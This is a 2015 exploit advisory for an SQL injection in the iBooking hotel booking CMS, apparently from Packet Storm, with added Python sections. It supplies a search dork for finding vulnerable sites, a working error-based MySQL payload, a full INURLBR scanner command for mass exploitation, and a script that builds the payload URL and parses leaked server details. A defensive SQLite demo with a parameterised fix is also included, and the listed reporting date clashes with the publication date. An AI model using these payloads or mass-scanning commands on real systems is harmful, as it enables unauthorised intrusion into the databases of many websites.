iBooking CMS SQL Injection

Cleiton Pinheiro, packetstormsecurity.com, PACKETSTORM:133599
Published: Sep 18, 2015

*# VENDOR:* www.ibooking.com.br  
*# Vulnerable versions:* ALL  
*# File:* filtro_faixa_etaria.php  
*# Parameter:* idPousada (GET)  
*# DORK:* intext:"Desenvolvido por ibooking"  
*# Reported:* 15/10/2015  
#  
---------------------------------------------------------------------------------  
# AUTHOR: Cleiton Pinheiro / Nick: googleINURL  
# EMAIL: [email protected]  
# Blog: http://blog.inurl.com.br  
# Twitter: https://twitter.com/googleinurl  
# Fanpage: https://fb.com/InurlBrasil  
# Pastebin http://pastebin.com/u/Googleinurl  
# GIT: https://github.com/googleinurl  
# PSS: http://packetstormsecurity.com/user/googleinurl  
# EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro  
# YOUTUBE: http://youtube.com/c/INURLBrasil  
# PLUS: http://google.com/+INURLBrasil  
#  
---------------------------------------------------------------------------------  
  
*# Description*  
The vulnerable request is issued by a JavaScript function in the booking engine under  
/motor-de-reservas: it fetches filtro_faixa_etaria.php with idPousada in the query string,  
and that value reaches the SQL query unfiltered.  
  
  
# Javascript code responsible for vulnerable request  
  
$.ajax({  
    type: "GET",  
    url: "filtro_faixa_etaria.php",  
    data: "qtde_quartos=1&idPousada=61",  
    success: function(xml){  
        $("#filtro_faixa_etaria").html(xml);  
    }  
});  
  
  
*# URL Vulnerable:*  
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61  
  
*# POC:*  
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)  
  
*# Example:*  
(MySQL error-based technique: the subquery groups INFORMATION_SCHEMA.CHARACTER_SETS by a key that ends in FLOOR(RAND(0)*2); the deterministic RAND(0) sequence makes MySQL hit the same key twice while filling the temporary GROUP BY table, and the resulting "Duplicate entry ... for key 'group_key'" error message reflects the key, i.e. @@version, compile OS and compile machine wrapped in the hex marker 0x203a3a494e55524c42525f56554c4e3a3a20 = ' ::INURLBR_VULN:: '.)  
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)  
  
*# Screenshot of the response:*  
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png  
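*# Why the payload works (added example, not part of the original advisory)*  
The advisory does not show the PHP behind filtro_faixa_etaria.php, so the snippet below only assumes the usual shape of this bug: idPousada is concatenated, unquoted, into a numeric WHERE clause, which is why "61 AND (...)" is accepted without any closing quote. The simulation uses SQLite, which has no MySQL-style duplicate-key error, so it shows the boolean-based form of the same flaw (61 AND 1=1 versus 61 AND 1=0, and 61 OR 1=1 to pull every row) next to a fixed handler that casts to int and binds the value as a parameter. Table and column names are made up for the illustration; the original page contains none of this code.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the booking engine's table (constructed schema, not iBooking's)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE faixa_etaria (id INTEGER PRIMARY KEY, id_pousada INTEGER, descricao TEXT);
        INSERT INTO faixa_etaria (id_pousada, descricao) VALUES
            (61, 'adulto'), (61, 'crianca'), (62, 'adulto');
        """
    )
    return con


def filtro_vulneravel(con: sqlite3.Connection, id_pousada: str) -> list:
    """Assumed shape of the bug: the GET value lands unquoted in the WHERE clause,
    the Python equivalent of "... WHERE id_pousada = " . $_GET['idPousada'] in PHP."""
    sql = "SELECT descricao FROM faixa_etaria WHERE id_pousada = " + id_pousada
    return [row[0] for row in con.execute(sql)]


def filtro_corrigido(con: sqlite3.Connection, id_pousada: str) -> list:
    """Hardened form: enforce the expected type first, then bind the value as a parameter
    so the database never sees it as SQL text."""
    try:
        valor = int(id_pousada)
    except ValueError:
        raise ValueError(f"idPousada must be an integer, got {id_pousada!r}") from None
    sql = "SELECT descricao FROM faixa_etaria WHERE id_pousada = ?"
    return [row[0] for row in con.execute(sql, (valor,))]


def demo() -> dict:
    """Run the same inputs through both handlers and collect what each returns."""
    con = make_db()
    out = {
        "legit": filtro_vulneravel(con, "61"),             # normal request
        "true_cond": filtro_vulneravel(con, "61 AND 1=1"),  # injected, still 2 rows
        "false_cond": filtro_vulneravel(con, "61 AND 1=0"),  # injected, 0 rows
        "or_all": filtro_vulneravel(con, "61 OR 1=1"),      # injected, every pousada
        "fixed": filtro_corrigido(con, "61"),
    }
    try:
        filtro_corrigido(con, "61 AND 1=1")
        out["fixed_rejects"] = False
    except ValueError:
        out["fixed_rejects"] = True  # the hardened handler refuses non-integer input
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The difference between the true_cond and false_cond results is exactly what a boolean-based check keys on when the server hides database errors; the error-based payload on this page is just a faster way to read the same injection point when MySQL's error text is echoed into the response.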
  
  
*# Mass exploitation using the INURLBR scanner*  
# Download: https://github.com/googleinurl/SCANNER-INURLBR  
  
*# COMMAND*  
*# SETTING THE SEARCH DORK:*  
--dork 'YOUR_DORK'  
*# USE* --dork 'intext:"Desenvolvido por ibooking"'  
  
*# SETTING OUTPUT FILE:*  
*# USE* -s 'ibooking.txt'  
  
*# SETTING THE EXPLOIT GET STRING:*  
--exploit-get 'EXPLOIT_GET'  
*# USE* --exploit-get  
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'  
  
*# SETTING THE TYPE OF VALIDATION:*  
*# USE* -t 3  
Type 3 combines types 1 and 2 and, in addition, requests each target with the  
--exploit-get string appended directly to the URL:  
Example: --exploit-get '/index.php?id=1&file=conect.php'  
Resulting request: http://www.target.br/index.php?id=1&file=conect.php  
  
*# SETTING THE VALIDATION STRING:*  
Specify the string the scanner looks for in the response to decide whether the target is vulnerable:  
Example: -a {string}  
Usage: -a '<title>hello world</title>'  
If the given value is found in the target's response, the target is reported as vulnerable.  
- USE: -a 'INURLBR_VULN'  
The INURLBR_VULN value is embedded in the --exploit-get string as the hex literal  
0x203a3a494e55524c42525f56554c4e3a3a20 (' ::INURLBR_VULN:: '), so it only shows up in  
the response when the database error message is reflected back by the page.  
  
*# COMMAND FULL:*  
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s  
'ibooking.txt' --exploit-get  
'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'  
-t 3 -a 'INURLBR_VULN'  
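*# Payload construction and response check (added example; not INURLBR's code and not part of the original advisory)*  
The scanner command above rests on two details worth seeing in code: the marker is smuggled into the query as the hex literal 0x203a3a494e55524c42525f56554c4e3a3a20 (' ::INURLBR_VULN:: ') so no quote characters are needed, and the -a check is nothing more than a substring match on the response body. The Python below rebuilds the advisory's exact payload and URL from their parts, then parses the leaked version, compile OS and compile machine out of a MySQL "Duplicate entry" message. The sample response is constructed for this example, not captured from a real host, and the PHP warning text in it is made up.

```python
import re

MARKER = " ::INURLBR_VULN:: "  # what INURLBR's -a 'INURLBR_VULN' looks for
PATH = "/motor-de-reservas/filtro_faixa_etaria.php"

# The advisory's own Example URL, kept verbatim so the builder can be checked against it.
ADVISORY_EXAMPLE_URL = (
    "http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada="
    "61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,"
    "(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,"
    "@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,"
    "FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)"
)

# Constructed sample body: the page content followed by an echoed MySQL error.
SAMPLE_RESPONSE = (
    '<select id="filtro_faixa_etaria"></select>\n'
    "Duplicate entry ' ::INURLBR_VULN:: 5.5.44-0+deb7u1 debian-linux-gnu x86_64"
    " ::INURLBR_VULN:: 1' for key 'group_key'"
)


def marker_hex() -> str:
    """Encode the marker as a MySQL 0x... string literal, which needs no quotes in the URL."""
    return "0x" + MARKER.encode("ascii").hex()


def build_payload(id_pousada: int = 61) -> str:
    """Rebuild the advisory's error-based MySQL payload from its parts.

    GROUP BY over a derived key ending in FLOOR(RAND(0)*2) makes MySQL insert the
    same key twice into its temporary table; the 'Duplicate entry' error echoes
    that key, i.e. marker + leaked values + marker + 0/1.
    """
    leak = (
        "(SELECT (concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,"
        "0x20,@@GLOBAL.version_compile_machine)))"
    )
    key = f"CONCAT({marker_hex()},{leak},{marker_hex()},FLOOR(RAND(0)*2))x"
    inner = f"SELECT COUNT(*),{key} FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x"
    return f"{id_pousada} AND (SELECT 2692 FROM({inner})a)"


def build_url(host: str, id_pousada: int = 61, qtde_quartos: int = 3) -> str:
    """Same encoding the advisory uses: spaces become '+', nothing else is escaped."""
    payload = build_payload(id_pousada).replace(" ", "+")
    return f"http://{host}{PATH}?qtde_quartos={qtde_quartos}&idPousada={payload}"


# Matches the echoed GROUP BY key: marker, leaked fields, marker, then the 0/1 from FLOOR(RAND(0)*2).
DUPLICATE_RE = re.compile(
    r"Duplicate entry '" + re.escape(MARKER) + r"(?P<leak>[^']*?)" + re.escape(MARKER) + r"[01]' for key"
)


def check_response(body: str):
    """Return (vulnerable, leaked_fields).

    'vulnerable' is exactly INURLBR's -a test: a substring match. The leaked fields
    are only filled in when a MySQL duplicate-key error is present in the body.
    """
    vulnerable = "INURLBR_VULN" in body
    m = DUPLICATE_RE.search(body)
    if not m:
        return vulnerable, None
    fields = m.group("leak").split(" ")
    names = ("version", "compile_os", "compile_machine")
    return vulnerable, dict(zip(names, fields))


if __name__ == "__main__":
    print(build_url("www.TARGET.br"))
    print(check_response(SAMPLE_RESPONSE))
```

The substring check only fires when the application prints mysql_error() (or equivalent) into the page. A host with display_errors off or a custom error handler is still injectable but is reported clean by -a 'INURLBR_VULN'; for such hosts fall back to a boolean or time-based check on the same parameter.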
  
*# MORE INFORMATION:*  
http://blog.inurl.com.br/2015/09/0day-ibooking-cms-injecao-de-sql-e.html  
  
  
  
*# GR33TS*  
* r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r,  
arplhmd, 0x4h4x  
* Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra,  
Eclipse, shaxer  
* dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão,  
IceKiller, c00z  
* Oystex, rH, Warflop, se4b3ar , Pablo Verlly Moreira  